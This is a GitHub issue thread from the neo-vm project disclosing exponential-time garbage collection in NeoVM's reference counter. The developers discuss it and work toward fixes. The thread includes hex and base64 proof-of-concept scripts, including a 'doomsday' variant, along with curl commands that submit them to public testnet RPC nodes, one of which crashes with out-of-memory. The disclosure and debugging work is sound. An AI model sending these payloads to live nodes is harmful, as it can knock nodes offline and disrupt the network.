neo-project/neo-vm

Unimaginable **Inefficient** Implementation of Garbage Collection in NeoVM

Closed this issue ยท 18 comments

Writing such a nested nested nested nested loop inside garbage collection is quite risky.

Carefully constructed scripts may cause DoS because of this.

Code Reference

        internal int CheckZeroReferred()
        {
            while (zero_referred.Count > 0)
            {
                HashSet<CompoundType> toBeDestroyed = new(ReferenceEqualityComparer.Instance);
                foreach (CompoundType compound in zero_referred)
                {
                    HashSet<CompoundType> toBeDestroyedInLoop = new(ReferenceEqualityComparer.Instance);
                    Queue<CompoundType> toBeChecked = new();
                    toBeChecked.Enqueue(compound);
                    while (toBeChecked.Count > 0)
                    {
                        CompoundType c = toBeChecked.Dequeue();
                        counter.TryGetValue(c, out Entry? entry);
                        if (entry?.StackReferences > 0)
                        {
                            toBeDestroyedInLoop.Clear();
                            break;
                        }
                        toBeDestroyedInLoop.Add(c);
                        if (entry?.ObjectReferences is null) continue;
                        foreach (var pair in entry.ObjectReferences)
                            if (pair.Value > 0 && !toBeDestroyed.Contains(pair.Key) && !toBeDestroyedInLoop.Contains(pair.Key))
                                toBeChecked.Enqueue(pair.Key);
                    }
                    if (toBeDestroyedInLoop.Count > 0)
                        toBeDestroyed.UnionWith(toBeDestroyedInLoop);
                }
                zero_referred.Clear();
                foreach (CompoundType compound in toBeDestroyed)
                {
                    counter.Remove(compound);
                    references_count -= compound.SubItemsCount;
                    foreach (CompoundType subitem in compound.SubItems.OfType<CompoundType>())
                    {
                        if (toBeDestroyed.Contains(subitem)) continue;
                        Entry entry = counter[subitem];
                        entry.ObjectReferences!.Remove(compound);
                        if (entry.StackReferences == 0)
                            zero_referred.Add(subitem);
                    }
                }
            }
            return references_count;
        }

Under the limitation MaxStackSize = 2048, the following script is constructed , whose time cost is O(2^510), (doomsday):

c2104d11c0114d11c0560101fe019d60114d114d12c05312c0584a24f3455145

to have a quick view for the PoC above use the following script. The time cost is restricted to O(2^25).

c2104d11c0114d11c0560100199d60114d114d12c05312c0584a24f3455145

BTW, theoretically, the maximized time cost is O(e^(MaxStackSize/2e)) where e, also known as Euler's number, is a mathematical constant approximately equal to 2.71828...

c2104d11c0114d11c0560101fe019d60114d114d12c05312c0584a24f3455145

OK,

NEO-GO-VM 0 > ops
INDEX    OPCODE       PARAMETER      
0        NEWARRAY0                   <<
1        PUSH0                       
2        PICK                        
3        PUSH1                       
4        PACK                        
5        PUSH1                       
6        PICK                        
7        PUSH1                       
8        PACK                        
9        INITSSLOT    1              
11       PUSHINT16    510 (fe01)     
14       DEC                         
15       STSFLD0                     
16       PUSH1                       
17       PICK                        
18       PUSH1                       
19       PICK                        
20       PUSH2                       
21       PACK                        
22       REVERSE3                    
23       PUSH2                       
24       PACK                        
25       LDSFLD0                     
26       DUP                         
27       JMPIF        14 (-13/f3)    
29       DROP                        
30       ROT                         
31       DROP                        
$ curl -d '{ "jsonrpc": "2.0", "id": 1, "method": "getversion", "params": [] }' https://rpc1t.n3.nspcc.ru:20331 | json_pp
{
   "result" : {
      "tcpport" : 20333,
      "useragent" : "/NEO-GO:0.95.3/",
      "network" : 844378958,
      "nonce" : 1247793163
   },
   "id" : 1,
   "jsonrpc" : "2.0"
}
$ curl -d '{ "jsonrpc": "2.0", "id": 1, "method": "invokescript", "params": ["whBNEcARTRHAVgEB/gGdYBFNEU0SwFMSwFhKJPNFUUU="] }' https://rpc1t.n3.nspcc.ru:20331 | json_pp
{
   "id" : 1,
   "result" : {
      "state" : "HALT",
      "gasconsumed" : "63129690",
      "stack" : "error: recursive reference",
      "script" : "whBNEcARTRHAVgEB/gGdYBFNEU0SwFMSwFhKJPNFUUU="
   },
   "jsonrpc" : "2.0"
}

@roman-khimov The impls between neo-go and neo(C#) are quite different.

Compared with neo(C#) the ref_counter in neo-go omitted many complex operations.
See https://github.com/nspcc-dev/neo-go/blob/master/pkg/vm/ref_counter.go and https://github.com/neo-project/neo-vm/blob/9008930da17c1fc68c8990515a07cd1abc2b3d19/src/neo-vm/ReferenceCounter.cs

Just like what you posted above, neo-go may just throw an error of recursive reference, but they are actually valid scripts in C# version.

Can you help to run such test using C# client?

@roman-khimov and, BTW, actually the StackItems constructed by such script is not recursive reference, they are just layered arrays

@roman-khimov just checked the impl of neo-go, if you concat two DROP after the existing script, it will be fine for neo-go.

using the following script

c2104d11c0114d11c0560101fe019d60114d114d12c05312c0584a24f34551454545

then

โžœ  ~ curl -d '{ "jsonrpc": "2.0", "id": 1, "method": "invokescript", "params": ["whBNEcARTRHAVgEB/gGdYBFNEU0SwFMSwFhKJPNFUUVFRQ=="] }' https://rpc1t.n3.nspcc.ru:20331 | json_pp
{
   "id" : 1,
   "jsonrpc" : "2.0",
   "result" : {
      "gasconsumed" : "63129810",
      "script" : "whBNEcARTRHAVgEB/gGdYBFNEU0SwFMSwFhKJPNFUUVFRQ==",
      "stack" : [],
      "state" : "HALT"
   }
}

neo-go has no garbage collection impl, so it is quick.

neo-go may just throw an error of recursive reference, but they are actually valid scripts in C# version.

It's interpreted correctly in neo-go:

    "result" : {
      "state" : "HALT",
      "gasconsumed" : "63129690",

actually the StackItems constructed by such script is not recursive reference, they are just layered arrays

Yes, that's just JSONization issue for us, I've seen this before. Actual stack contents is correct and must be the same as with correct C# implementation.

@vang1ong7ang yeah, this error is also returned when any reference is encountered twice during the marshaling (in your script the array created on the line 0). Marshaling of such structs can lead to the exponential blowoff in complexity. And while we can make time cost linear (just cache the results), resulting json can still take a lot of space (though I haven't measured maximum possible size exactly).

neo-go may just throw an error of recursive reference, but they are actually valid scripts in C# version.

It's interpreted correctly in neo-go:

    "result" : {
      "state" : "HALT",
      "gasconsumed" : "63129690",

actually the StackItems constructed by such script is not recursive reference, they are just layered arrays

Yes, that's just JSONization issue for us, I've seen this before. Actual stack contents is correct and must be the same as with correct C# implementation.

Yeah, I see, it is just json serialization issues. so then I just drop the existing StackItem on the ResultStack and it works

@roman-khimov The impls between neo-go and neo(C#) are quite different.

Compared with neo(C#) the ref_counter in neo-go omitted many complex operations.
See https://github.com/nspcc-dev/neo-go/blob/master/pkg/vm/ref_counter.go and https://github.com/neo-project/neo-vm/blob/9008930da17c1fc68c8990515a07cd1abc2b3d19/src/neo-vm/ReferenceCounter.cs

Just like what you posted above, neo-go may just throw an error of recursive reference, but they are actually valid scripts in C# version.

Can you help to run such test using C# client?

@roman-khimov @vang1ong7ang I've tested that code on C# node. Here is the result. 11 seconds are cost and a few gas is cost.

If the doomsday code is submitted, the node will OOM.

โžœ  ~ time curl -d '{ "jsonrpc": "2.0", "id": 1, "method": "invokescript", "params": ["whBNEcARTRHAVgEAGZ1gEU0RTRLAUxLAWEok80VRRUVF"
] }' http://seed3t.neo.org:20332 | json_pp
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   273    0   158  100   115     13     10  0:00:11  0:00:11 --:--:--    39
{
   "id" : 1,
   "jsonrpc" : "2.0",
   "result" : {
      "exception" : null,
      "gasconsumed" : "3212910",
      "script" : "whBNEcARTRHAVgEAGZ1gEU0RTRLAUxLAWEok80VRRUVF",
      "stack" : [],
      "state" : "HALT"
   }
}
โžœ  ~ curl -d '{ "jsonrpc": "2.0", "id": 1, "method": "invokescript", "params": ["whBNEcARTRHAVgEB/gGdYBFNEU0SwFMSwFhKJPNFUUVFRQ=="] }' http://seed3t.neo.org:20332 | json_pp
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   350    0   231  100   119      9      4  0:00:29  0:00:24  0:00:05    49
{
   "id" : 1,
   "jsonrpc" : "2.0",
   "result" : {
      "exception" : "Exception of type 'System.OutOfMemoryException' was thrown.",
      "gasconsumed" : "63129690",
      "script" : "whBNEcARTRHAVgEB/gGdYBFNEU0SwFMSwFhKJPNFUUVFRQ==",
      "stack" : [],
      "state" : "FAULT"
   }
}

@vang1ong7ang yeah, this error is also returned when any reference is encountered twice during the marshaling (in your script the array created on the line 0). Marshaling of such structs can lead to the exponential blowoff in complexity. And while we can make time cost linear (just cache the results), resulting json can still take a lot of space (though I haven't measured maximum possible size exactly).

Yes, and actually in the garbage collection impl of C# node, the script brings exponential complexity to CheckZeroReferred, too, which is not only a RPC risk but also a vm runtime risk.

@dusmart

kkkkkk. seems that it's time to build another version to just bypass the OOM and lives longer kkkkkk.

ALSO, OOM should be avoid in vm implementations because different machines have different memory size and it may cause network fork.

image

It was 10 seconds in my machine

image

image

It was 10 seconds in my machine

image

Hi, @shargon. Your Top Function and Hot Path chart is very useful for our exploration. Could you please share that tool?

Can I use that in my local machine? What's the tool's name?

@dusmart you need to create an executable project

image

And then just use the VS performance profiler tool

image

When it finish you will get all the stats :)

@vang1ong7ang Can you check if #459 or #460 have an improvement?